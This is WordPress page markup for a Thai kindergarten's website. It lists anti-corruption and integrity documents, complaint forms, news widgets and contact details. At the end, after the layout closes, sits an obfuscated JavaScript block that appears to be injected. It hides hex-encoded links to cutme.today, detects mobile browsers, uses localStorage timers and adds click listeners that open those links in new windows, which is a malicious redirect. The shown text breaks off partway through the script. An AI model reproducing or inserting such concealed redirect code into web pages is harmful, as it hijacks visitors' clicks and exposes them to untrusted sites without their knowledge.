900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const 